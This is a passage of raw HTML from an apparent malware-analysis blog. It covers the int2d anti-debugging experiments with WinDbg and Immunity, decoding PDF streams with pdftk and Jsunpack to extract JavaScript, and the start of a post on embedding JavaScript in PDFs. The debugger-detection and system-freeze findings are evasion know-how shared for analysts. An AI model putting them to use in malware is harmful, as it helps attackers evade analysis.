<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPEzTVTAtX_ViaZtpfPa6pOQYbu_aDViIncA8hfDra5rMIcl1w-TwI2nM6j1k66POQZXBabfV_8s4Brgzxe0VkL4l7jmlePPgCm47wVt_Tm6f2Cphqw7Gnb_Sn-GfBL6pv4xBonhQtxRDw/s1600/Figure+2-7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPEzTVTAtX_ViaZtpfPa6pOQYbu_aDViIncA8hfDra5rMIcl1w-TwI2nM6j1k66POQZXBabfV_8s4Brgzxe0VkL4l7jmlePPgCm47wVt_Tm6f2Cphqw7Gnb_Sn-GfBL6pv4xBonhQtxRDw/s400/Figure+2-7.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.7 – <i>Serial port configuration for the windows host system</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Figure 2.7 displays the command issued to start a windbg session through the windows SDK command prompt. The port must match the virtual box serial configuration shown above.</span></div>
<div style="text-align: justify;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM7MBZsDZQ9XQcwOekek2VHKBvg1daN2PJr17isy4dvK0cqNP3idCbbAAkqop45bQpkYTCEu5HFrqb8GluUK5-F9rPD1L2dp7H3h1iJToKCZfLjbv_mj2qUarmjL2xYRREVipVAXsYv6dn/s1600/Figure+2-8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM7MBZsDZQ9XQcwOekek2VHKBvg1daN2PJr17isy4dvK0cqNP3idCbbAAkqop45bQpkYTCEu5HFrqb8GluUK5-F9rPD1L2dp7H3h1iJToKCZfLjbv_mj2qUarmjL2xYRREVipVAXsYv6dn/s640/Figure+2-8.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.8 – <i>Windows SDK 7.1 Command prompt and command to connect to host system</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">A successful connection to the host machine presents the following window shown below in Figure 2.6. Windbg executes an interrupt “int 3” on the machine by default when first connected and the command “g”, which stands for go, resumes the execution of the host system.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJAJFBFMu6VAsDiCPEIsiRGEN24QIS4lNVwt87zrX5lAM29Ehwwu9JPw4jZk_n-BAz73SEUYLeZ2TVWRajHHJtMeDwokpQdLxY5mDvNQh2NHXugWZ6BrruUdkeoJNKb_evHn6qDXxXbIbz/s1600/Figure+2-9.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="568" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJAJFBFMu6VAsDiCPEIsiRGEN24QIS4lNVwt87zrX5lAM29Ehwwu9JPw4jZk_n-BAz73SEUYLeZ2TVWRajHHJtMeDwokpQdLxY5mDvNQh2NHXugWZ6BrruUdkeoJNKb_evHn6qDXxXbIbz/s640/Figure+2-9.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.9 – <i>A successful connection established in WinDbg</i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">This command is also used to continue execution of the host machine when an exception has been raised and the host system waits for the exception to be handled. This command is used in the following experiments.</span></div>
<br />
<span style="font-size: large;"><b>5. Int2d Experiment Results</b></span><br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Figure 2.8 presents results for the experiments with the int2d instruction. The values 1, 2, 3, 4, and 99 are used for the register EAX. Also the int2dprint program executes in different debugging environments and the different combinations are listed below.</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFnXxpkMhacjPF2tOadp5vvaDu5ifCFaFY6HlwLb8xCLgiobqsBcevWn_xUqrDTv8E1YihYQlUgF14ThS2JKTzfxd0UT_gfLz_iw8RZs8_0_0yhJzgFROd2Jc7V4sM5odQOra00RcZ2kLq/s1600/Figure+2-10.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="479" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFnXxpkMhacjPF2tOadp5vvaDu5ifCFaFY6HlwLb8xCLgiobqsBcevWn_xUqrDTv8E1YihYQlUgF14ThS2JKTzfxd0UT_gfLz_iw8RZs8_0_0yhJzgFROd2Jc7V4sM5odQOra00RcZ2kLq/s640/Figure+2-10.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: left;"><i><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;">Figure 2.10</span></i><span style="font-family: Calibri, sans-serif; font-size: 10pt; line-height: 115%;"> - Results for executing int2dexp.exe in various debugging environments and with different values for the <br />
EAX register</span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">One particular area of interest is the row where the EAX register value is one and the different debugging environments are tested. Red text indicates that the “INC” instruction executed and the int2d did not cause a byte to be skipped. This behavior is observed only when a kernel debugger is attached to the system, in this case windbg. When windbg is not attached to the system and the EAX register value is one, the int2d interrupt does cause a byte to be skipped. This is significant due to the fact different behaviors are observed and can be used to determine when a debugger is attached and when it is not attached.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">From the figure above we can see there is a way to precisely identify if the system is set up in one of four configurations. One configuration is a kernel debugger and a user level debugger attached to a system. The second configuration is a kernel debugger and no user level debugger attached. The third configuration is no kernel debugger and a user level debugger attached. The last configuration is no kernel debugger and no user level debugger attached. Each of the configurations can be identify by their unique behavior.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The configuration of no kernel debugger and no user level debugger can be identified when EAX is equal to zero. Figure 2.10 shows that only in this set up, where the EAX is equal to zero, the “int2dprint” program displays no characters in the command window.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The configuration of no kernel debugger and immunity debugger can be identified when the EAX is equal to two. When the EAX is equal to two, this is the only set up where the output of “int2dprint”is “AAAA” for the “JZ0” command and “AAAABBBB” for the “JNZ” command. Two other configurations also print the same statements, however, only after the WinDbg breakpoint is resumed by the guest system.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The third configuration of kernel debugger and no user level debugger attached can be identified when the EAX register is equal to zero. Only in this set up the “INC EAX” is executed and the resulting display is “AAAABBBB” for the “JZ0” command and “AAAA” for the “JNZ” command.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The last configuration of kernel debugger and user level debugger can also be identified but in two steps. When EAX is equal to zero, there is one configuration that shares the same result where there is a kernel debugger and user level debugger attached to the system. The second configuration that shares the same result for the “int2dprint” is where there is no kernel debugger and a user level debugger is attached. For both of these set ups the result of the program is “AAAA” for the “JZ0” command and “AAAABBBB” for the “JNZ” command. The configuration of kernel debugger and user level debugger attached can be determined by checking the EAX value of two after the EAX value of zero. If the output is not “AAAA” for “JZ0” when the EAX value is equal to two, then the configuration we have is a kernel debugger and user level debugger attached. Alternately, process of elimination can be used since three of the four configurations can be identified.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Here lies the reason the int2d instruction serves as an anti-debugging technique. A program with an int2d interrupt can cause a program to execute differently with a debugger attached as opposed to without a debugger. As shown above with Immunity debugger, when EAX equals one, “AAAABBBB” printed with a debugger was attached. “AAAA” printed with no debugger was attached. Malware authors use this interrupt to prevent accurate analysis of their malware.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">An important note to make is that int2d can be used to crash a system. As shown in <i>Figure 2.10</i>, when the EAX register is equal to zero, and the computer is in debug mode, and immunity debugger is not attached, if the int2d instruction is used then the system will freeze and require a manual reboot. Also a system can be crashed with immunity debugger attached. If the EAX register is changed to two and the int2d is executed, again the system freezes and requires a manual reboot.</span></div>
<br />
<span style="font-size: large;"><b>6. References</b></span><br />
[1] Dr. Xiang Fu, Malware Analysis Tutorial 4: Int2dh Anti-Debugging, Available at <br />
<a href="http://fumalwareanalysis.blogspot.com/2011_10_01_archive.html">http://fumalwareanalysis.blogspot.com/2011_10_01_archive.html</a>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-8501561183307667545.post-49949717076738505402012-03-02T14:26:00.004-08:002012-03-20T18:01:35.057-07:00Decode PDF and Extract Javascript<span style="font-size: large;">1. Introduction</span><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In the previous articles we looked at how to manually create a PDF and how to embed JavaScript inside the PDF document. I will now continue to look at how to extract JavaScript and decompress a PDF in order to reverse engineer the code inside. When a PDF is created or saved, the streams inside the PDF are commonly compressed and encoded with filters such as “FlateDecode”. The stream objects in a PDF are the objects which contain the JavaScript or text which we wish to read. Many times malware authors embed their malicious code inside these JavaScript streams and it is beneficial for security professionals to extract and decompress these streams. Let us revisit the PDF example presented in the previous article <a href="http://mariomalwareanalysis.blogspot.com/2012/02/how-to-embed-javascript-into-pdf.html" target="_blank"><i>How to Embed JavaScript into PDF</i></a>. Since the PDF was manually created, the streams are in plaintext, however, we will use Adobe Acrobat 9 to save the file again and this time the streams are encoded and not readable in a file editor.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxZoxIrqHGxhxes7Bm-oOFUODywPeR2O6v94qxlu_ieqAGuU_aOLqLEF25qRmrK7Fc5qagZQ9NyyZyD-udYf2HYD8bX6okHhLImy1MshNyjO23h0Gopllanhg9WDNKIRQmkoBkrfEhJiKn/s1600/Figure+1-1+wOutline+crop.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxZoxIrqHGxhxes7Bm-oOFUODywPeR2O6v94qxlu_ieqAGuU_aOLqLEF25qRmrK7Fc5qagZQ9NyyZyD-udYf2HYD8bX6okHhLImy1MshNyjO23h0Gopllanhg9WDNKIRQmkoBkrfEhJiKn/s640/Figure+1-1+wOutline+crop.PNG" width="640" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Above is a partial view of the PDF we created in the previous article with the streams encoded. As you can see the PDF has been modified. More objects have automatically been added and the original streams with JavaScript are not readable. Also the first header line which tells me the PDF specification this document follows has been changed as well. Originally it was “%PDF-1.6”, now it is “%PDF-1.6”. This is due to the version of Acrobat I used which is Acrobat Pro 9. Other changes can also be found such as metadata that is now included in the document.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdODgT-hc03PE2R-4XOeNK6v8EgBHXOdue509c7kQHvEWmz68pVKAxSpw1tZ0z4bgk_z46tqGef62qbEUiDaQ30gpU5KFUwLHKMPAmbtNeM4NV6275-ckIWjsNtmMKSADipiMzowDm_C_P/s1600/Figure1-2+wOutline.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdODgT-hc03PE2R-4XOeNK6v8EgBHXOdue509c7kQHvEWmz68pVKAxSpw1tZ0z4bgk_z46tqGef62qbEUiDaQ30gpU5KFUwLHKMPAmbtNeM4NV6275-ckIWjsNtmMKSADipiMzowDm_C_P/s640/Figure1-2+wOutline.PNG" width="640" /></a></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The streams may be compressed with several different filters, most commonly the FlateDecode filter is used to encode a PDF. After inspection of the document we can see that the PDF has been encoded using the filter FlateDecode. There are two tools we can use this decode the PDF. The first tool is “pdftk” available for download at <a href="http://www.pdflabs.com/tools/pdftk-the-pdf-toolkit/">http://www.pdflabs.com/tools/pdftk-the-pdf-toolkit/</a>. This program runs on Windows, Linux, Mac OS X, FreeBSD and Solaris. It has many features which allow us to manipulate a PDF, among them is the ability to decompress streams and read the file in plain text. The second tool is “Jsunpack-n”. It is a powerful tool to decode and extract JavaScript from a PDF file.</span></div><br />
<span style="font-size: large;">2. PDF Toolkit</span><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">PDF toolkit is easy to install. Download the zip file from their website and place it in a convenient location. Then add the location of the bin folder to your environment variables. This can be done by accessing the properties of your computer and clicking on the advanced tab.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGfLLmmvpPdtB9io2UILlPgGjtnYFUDdfQr4ZgULGyK-dKH2WZdy7XyMpE3TRG780ZK5lC1VW9LPSWCiUPOSoYDFhYXuTmyOjZzmt-o3Cs2F-4TogPQtj9UcLiKCEbvDWd6AkGjYQOiyUT/s1600/Windows-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGfLLmmvpPdtB9io2UILlPgGjtnYFUDdfQr4ZgULGyK-dKH2WZdy7XyMpE3TRG780ZK5lC1VW9LPSWCiUPOSoYDFhYXuTmyOjZzmt-o3Cs2F-4TogPQtj9UcLiKCEbvDWd6AkGjYQOiyUT/s400/Windows-1.png" width="342" /></a></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Click on “Environment Variables” and here we locate the "Path" variable and add the location of our bin folder for pdftk. This allows us to use pdftk from the command prompt without having to navigate to the program folder each time.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6iJCze8xP8yE5aAfTIR69C2pfYK0hPG0REIJ4CUyyz2-40OqoLE1vk124vJbfoWmBHcAh5rxJB4S_YXa3zj5SD5zeWT18L-ajzkBBMDvwMiLDcYuL1dPkF2eaiogSS5u17rrp7QgWJ6Hz/s1600/Windows-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6iJCze8xP8yE5aAfTIR69C2pfYK0hPG0REIJ4CUyyz2-40OqoLE1vk124vJbfoWmBHcAh5rxJB4S_YXa3zj5SD5zeWT18L-ajzkBBMDvwMiLDcYuL1dPkF2eaiogSS5u17rrp7QgWJ6Hz/s400/Windows-2.png" width="356" /></a></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Below is the command used to decompress the PDF file. First is the call to the program pdftk. Second we list the location of the PDF we wish to decompress. Third is the parameter output. Here we list the new filename we wish to use for our decompressed file. Last we specify the parameter “uncompress” which will decode the streams in the PDF file. To view all the commands in pdftk and the accompanying examples, type the command “pdftk –help”.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJrsqD0fXiXjRxcaifXZ7ON-n_er4hKbwkbxw6EYhkhle0Ru3XiRq7MsoE3rY7S2O5vvjOGbK20cGSl24RAWZ7mS6ZfZ8c3weHglBvdCBtKyRBFPj_Wc71U8ZUbyV5wrqPVtuYkGPnk8JO/s1600/Figure+1-3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="35" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJrsqD0fXiXjRxcaifXZ7ON-n_er4hKbwkbxw6EYhkhle0Ru3XiRq7MsoE3rY7S2O5vvjOGbK20cGSl24RAWZ7mS6ZfZ8c3weHglBvdCBtKyRBFPj_Wc71U8ZUbyV5wrqPVtuYkGPnk8JO/s640/Figure+1-3.PNG" width="640" /></a></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The decoded file is created and below is the file opened in the file editor notepad++. Selected parts of the code are shown below with the corresponding line number to the left.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE4-VL_BT3NKv3jW6i47d8zJuWUlRIDiRGgSrPkViJ8ljBxROPHOHCMpmxdouCO1SIX04krDYH_GoEv3JpKeLeh7vISSy36ch6uKQqkijGZyrZ4sZmdWSBSbJvmqmiLkAQXjZfVlNEqEog/s1600/Figure+1-7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE4-VL_BT3NKv3jW6i47d8zJuWUlRIDiRGgSrPkViJ8ljBxROPHOHCMpmxdouCO1SIX04krDYH_GoEv3JpKeLeh7vISSy36ch6uKQqkijGZyrZ4sZmdWSBSbJvmqmiLkAQXjZfVlNEqEog/s640/Figure+1-7.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcmx1LlKK_rvbp-puxXMZdycycS0nNpEIIN1ndHjQWOaEzAwBxuDqURK1LsecaxTp595Iy0O9rkr0ziKaKlAQw6gbeBdKtf0EP-BgBVS0nzHvnruIhMn8apFqMIzsolFgIrYmJM83BLANY/s1600/Figure+1-8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcmx1LlKK_rvbp-puxXMZdycycS0nNpEIIN1ndHjQWOaEzAwBxuDqURK1LsecaxTp595Iy0O9rkr0ziKaKlAQw6gbeBdKtf0EP-BgBVS0nzHvnruIhMn8apFqMIzsolFgIrYmJM83BLANY/s640/Figure+1-8.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9f1o9bfWKNftgL5VOcUMzAwNQEmCH7n_fkKon7SCYnIm8zy8bzS3WRqZ-0Sd7NIqq0Wdo78kkX5RAIhTL2xdaj2dyojF2CZIrKUQuC34FlZPTvAIIK9UIwAJpQt7_4iMt2cdlpxI_XmtO/s1600/Figure+1-9.PNG" imageanchor="1" style="display: inline !important; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9f1o9bfWKNftgL5VOcUMzAwNQEmCH7n_fkKon7SCYnIm8zy8bzS3WRqZ-0Sd7NIqq0Wdo78kkX5RAIhTL2xdaj2dyojF2CZIrKUQuC34FlZPTvAIIK9UIwAJpQt7_4iMt2cdlpxI_XmtO/s640/Figure+1-9.PNG" width="640" /></a></div><br />
<br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">First we can see that the streams are in plain text. We can identify the object 9 which contains the JavaScript for our alert box. Something to notice is that for the xref section of the file we had previously left this part blank with only the object name. After it was encoded and decoded the offsets were automatically calculated for all the objects.</span></div><br />
<span style="font-size: large;">3. Jsunpack</span><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The second tool we can utilize to decode and extract the JavaScript in a PDF file is Jsunpack. I tested it on Ubuntu 10.04 and the latest version can be obtained by running the following code in Ubuntu</span></div><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"> $ svn checkout http://jsunpack-n.googlecode.com/svn/trunk/ jsunpack-n</span><br />
<br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Follow the instructions in the INSTALL file to complete the installation. After installed we can use the terminal to examine a PDF file. I tested it on my previous sample PDF file and the file was decoded however no JavaScript was decoded. Therefore I tested it on a sample JavaScript clock file which served as a better example. The JavaScriptClock file is available at <a href="http://www.pdfscripting.com/public/47.cfm">http://www.PDFscripting.com/public/47.cfm</a>. Open the file in a file editor and it is visible that the streams are encoded.</span></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Below is the command to call the PDF python script. You provide the location of the PDF file and the python script handles the rest. For more verbose information on the file attach a “-v” to the end of the command. The command below decodes the file and extracts the JavaScript embedded in the PDF to a separate file that we can examine. Jsunpack appends “.out” to the new file created.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkopRjkpHcBJHG3aqRjLJrhAHnywRlppw65NFvvD6X-jdz51nq3cxHhQh8eX2LPQfXVZ2UxV0VCWzEBXHdxL1Cpy_96e5AxqhWDEn_IH4yhuEQG6apc-fuBxTBIW-wtXDLkSKSsdtRi6Bz/s1600/Figure+1-4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkopRjkpHcBJHG3aqRjLJrhAHnywRlppw65NFvvD6X-jdz51nq3cxHhQh8eX2LPQfXVZ2UxV0VCWzEBXHdxL1Cpy_96e5AxqhWDEn_IH4yhuEQG6apc-fuBxTBIW-wtXDLkSKSsdtRi6Bz/s640/Figure+1-4.PNG" width="640" /></a></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">“JavaScriptClock.PDF.out” contains the JavaScript and below is a partial output in gedit. We can see all the functions and declarations that were made using JavaScript. This provides a useful way to look at obfuscated PDF that may contain malicious code.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU0s352MheEH46yUswT1UWhUgTcevOgt3rd3dWXsyJP6jbhk-0uRZ5m4DwJhY3OgbW98ZdH6orwKo70k4AHkZlzyrdFysaMVOK7futzQP1QIxk1gq3MR1VLSTj9WfxTwe5O8EPFFnYoWQk/s1600/Figure+1-5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="492" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU0s352MheEH46yUswT1UWhUgTcevOgt3rd3dWXsyJP6jbhk-0uRZ5m4DwJhY3OgbW98ZdH6orwKo70k4AHkZlzyrdFysaMVOK7futzQP1QIxk1gq3MR1VLSTj9WfxTwe5O8EPFFnYoWQk/s640/Figure+1-5.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwwS-dpq4t9j8FiPaPW7AhFT7anjWZwWFSvMcVrt8xewFzWkMc8OPqDGf5h3VF5LCoNTZonfq3FiYEnBC_YE_zBa71AXP4LnFJ8PbENHyepPOk1ZaIOvxg7ejz1YAQ_kCIyZb-C4x4G7cq/s1600/Figure+1-6+wOutline+crop.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="498" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwwS-dpq4t9j8FiPaPW7AhFT7anjWZwWFSvMcVrt8xewFzWkMc8OPqDGf5h3VF5LCoNTZonfq3FiYEnBC_YE_zBa71AXP4LnFJ8PbENHyepPOk1ZaIOvxg7ejz1YAQ_kCIyZb-C4x4G7cq/s640/Figure+1-6+wOutline+crop.PNG" width="640" /></a></div><br />
<span style="font-size: large;">4. Conclusion</span><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">To conclude, there are tools that exist to make it easier to manipulate and decode PDF documents. Above I have shown two tools, pdftk and Jsunpack, that are useful to decode streams in a PDF. The streams will usually contain JavaScript and unfortunately malware authors will embed JavaScript that will perform undesired functions in another user’s computer. These tools allow us to reverse engineer the code and discover if malicious code is embedded. As shown above Jsunpack also provides the user with all the JavaScript in a separate file which is useful for analysis. In the next article I will explore buffer overflow attacks and vulnerabilities of PDFs and previous versions of adobe acrobat.</span></div><br />
<span style="font-size: large;">References</span><br />
[1] "Document Management - Portable Document Format", Available at <br />
<a href="http://www.adobe.com/devnet/pdf/pdf_reference.html">http://www.adobe.com/devnet/pdf/pdf_reference.html</a><br />
[2] Michael Leigh, "<i>Malware Analyst's Cookbook and DVD</i>", Available at<br />
<a href="http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033">http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8501561183307667545.post-89466481908855297152012-02-26T05:29:00.001-08:002012-02-26T05:33:44.247-08:00How to Embed JavaScript into PDF<div class="MsoNormal"><span style="font-size: large;">1. Introduction</span><o:p></o:p></div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In this article I continue from my last post<i> <a href="http://mariomalwareanalysis.blogspot.com/2012/02/how-to-manually-create-pdf.html" target="_blank">How to Manually Create a PDF</a></i>. I explain how to embed JavaScript into a PDF document and how to extract the JavaScript from a document as well. Malicious code is often embedded as JavaScript inside a PDF document and extraction of the JavaScript is a useful method to isolate and reverse engineer the code for security professionals.</span><br />
<br />
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;"><span style="font-size: large;">2. AlertBox Example</span><o:p></o:p></div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In the last article I explained the format for a PDF and provided a simple example that printed “Hello World!” at the top of the document. It contained only the bare essentials and we will now add on to the example and include JavaScript. Below is the code for the original example created in the last post.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdWaJ0IEJT-JoFmXr_AK4gO3hpc4hT0HdiTgEwGPdxSyKULH0ghB_5NQRqPNJDfeTEiIcr4r5Lik831-f4d3DSQrzybRcda-0ziPB2OsyoteeSItjV2Wpzm6OOQrOPzEuFgZ0CELruEo-l/s1600/Figure1-2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdWaJ0IEJT-JoFmXr_AK4gO3hpc4hT0HdiTgEwGPdxSyKULH0ghB_5NQRqPNJDfeTEiIcr4r5Lik831-f4d3DSQrzybRcda-0ziPB2OsyoteeSItjV2Wpzm6OOQrOPzEuFgZ0CELruEo-l/s1600/Figure1-2.JPG" /></a></div><br />
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In order to introduce JavaScript to the PDF we need to modify the original example and add three new objects. The first object will be an indirect object that has a reference to the JavaScript object.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Go9nRX0YKo4xvbZ0nBc7wmeAzlkpB0LgvqTk58tJNwyLANFhAcQivSPOzSWHlBPVIThTSDfavASglT_8sD95mn_XMW8IBp9B7W_rVs-wJhc9mOvMGkTo7nuoJ9bDdZHtTORi9K1-L7aa/s1600/Figure1-2.PNG" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Go9nRX0YKo4xvbZ0nBc7wmeAzlkpB0LgvqTk58tJNwyLANFhAcQivSPOzSWHlBPVIThTSDfavASglT_8sD95mn_XMW8IBp9B7W_rVs-wJhc9mOvMGkTo7nuoJ9bDdZHtTORi9K1-L7aa/s1600/Figure1-2.PNG" /></a></div><br />
